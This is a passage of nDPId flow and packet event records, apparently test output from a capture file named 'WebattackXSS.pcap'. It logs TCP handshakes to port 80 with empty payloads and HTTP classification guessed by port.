-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3834,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":1499347427367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347427367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UGZAAD4GdXKsEAABwKgKMt70AFC9kfixvLBx6YAQAOUSiwAAAQEICgE6qNUD5HpL"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347428671,"flow_last_seen":1499347428671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347428671,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1499347428671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347428671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vFFAAD4GCX+sEAABwKgKMt8CAFCqwBZKAAAAAKACchATUQAAAgQFtAQCCAoBOqobAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":1499347428671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347428671,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3wITPWXXqsAWS6AScSAbpgAAAgQFtAQCCAoD5HuRATqqGwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3846,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":1499347428672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347428672,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vFJAAD4GCYasEAABwKgKMt8CAFCqwBZLEz1l2IAQAOW6rQAAAQEICgE6qhsD5HuR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3862,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347431192,"flow_last_seen":1499347431192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347431192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3862,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1499347431192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347431192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+sNAAD4GywysEAABwKgKMt8cAFA\/1VZRAAAAAKACchA7pAAAAgQFtAQCCAoBOqySAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":1499347431192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347431192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3xwMzQFkP9VWUqAScSCsZgAAAgQFtAQCCAoD5H4HATqskgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":1499347431193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347431193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+sRAAD4GyxOsEAABwKgKMt8cAFA\/1VZSDM0BZYAQAOVLbgAAAQEICgE6rJID5H4H"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347432482,"flow_last_seen":1499347432482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347432482,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1499347432482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347432482,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rn5AAD4GF1KsEAABwKgKMt8qAFCuFwOqAAAAAKACchAeuQAAAgQFtAQCCAoBOq3UAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":2,"flow_last_seen":1499347432482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347432482,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ypOGaUvrhcDq6AScSCpIAAAAgQFtAQCCAoD5H9KATqt1AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":3,"flow_last_seen":1499347432482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347432482,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rn9AAD4GF1msEAABwKgKMt8qAFCuFwOrThmlMIAQAOVIKAAAAQEICgE6rdQD5H9K"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3889,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347433753,"flow_last_seen":1499347433753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347433753,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3889,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1499347433753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347433753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JW1AAD4GoGOsEAABwKgKMt84AFAetop\/AAAAAKACchAl+QAAAgQFtAQCCAoBOq8SAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3890,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":1499347433753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347433753,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3zgqPCDhHraKgKAScSBXTwAAAgQFtAQCCAoD5ICHATqvEgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":3,"flow_last_seen":1499347433754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347433754,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JW5AAD4GoGqsEAABwKgKMt84AFAetoqAKjwg4oAQAOX2VgAAAQEICgE6rxID5ICH"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347305402,"flow_last_seen":1499347310703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347305402,"flow_last_seen":1499347310703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347306680,"flow_last_seen":1499347311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347306680,"flow_last_seen":1499347311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347309314,"flow_last_seen":1499347314704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347309314,"flow_last_seen":1499347314704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347310567,"flow_last_seen":1499347315705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347310567,"flow_last_seen":1499347315705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347313106,"flow_last_seen":1499347318705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347313106,"flow_last_seen":1499347318705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347314358,"flow_last_seen":1499347319705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347314358,"flow_last_seen":1499347319705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347436274,"flow_last_seen":1499347436274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347436274,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1499347436274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347436274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W69AAD4GaiGsEAABwKgKMt9SAFA\/BeonAAAAAKACchCjcQAAAgQFtAQCCAoBOrGIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3906,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":1499347436274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347436274,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ31ICI0S7PwXqKKAScSDWjwAAAgQFtAQCCAoD5IL+ATqxiAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3907,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":3,"flow_last_seen":1499347436274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347436274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W7BAAD4GaiisEAABwKgKMt9SAFA\/BeooAiNEvIAQAOV1lwAAAQEICgE6sYgD5IL+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347437541,"flow_last_seen":1499347437541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347437541,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1499347437541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347437541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80SpAAD4G9KWsEAABwKgKMt9gAFCd2mPvAAAAAKACchDJiQAAAgQFtAQCCAoBOrLFAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":1499347437541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347437541,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ32BqH6Tbndpj8KAScSAzTwAAAgQFtAQCCAoD5IQ6ATqyxQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3918,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":1499347437542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347437542,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00StAAD4G9KysEAABwKgKMt9gAFCd2mPwah+k3IAQAOXSVgAAAQEICgE6ssUD5IQ6"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347440119,"flow_last_seen":1499347440119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347440119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1499347440119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347440119,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Op5AAD4GizKsEAABwKgKMt96AFDbdo\/XAAAAAKACchBdZwAAAgQFtAQCCAoBOrVJAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3938,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":1499347440120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347440120,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ33qAsDTj23aP2KAScSAeDwAAAgQFtAQCCAoD5Ia\/ATq1SQEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":1499347440120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347440120,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Op9AAD4GizmsEAABwKgKMt96AFDbdo\/YgLA05IAQAOW9FQAAAQEICgE6tUoD5Ia\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347441364,"flow_last_seen":1499347441364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347441364,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1499347441364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347441364,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87qpAAD4G1yWsEAABwKgKMt+IAFCFjlgqAAAAAKACchDptwAAAgQFtAQCCAoBOraAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":2,"flow_last_seen":1499347441364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347441364,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ34gRswTRhY5YK6AScSBIOAAAAgQFtAQCCAoD5If2ATq2gAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":3,"flow_last_seen":1499347441365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347441365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07qtAAD4G1yysEAABwKgKMt+IAFCFjlgrEbME0oAQAOXnPgAAAQEICgE6toED5If2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347442626,"flow_last_seen":1499347442626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347442626,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1499347442626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347442626,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WP9AAD4GbNGsEAABwKgKMt+WAFAR1u9DAAAAAKACchDFDAAAAgQFtAQCCAoBOre8AAAAAAEDAwc="} 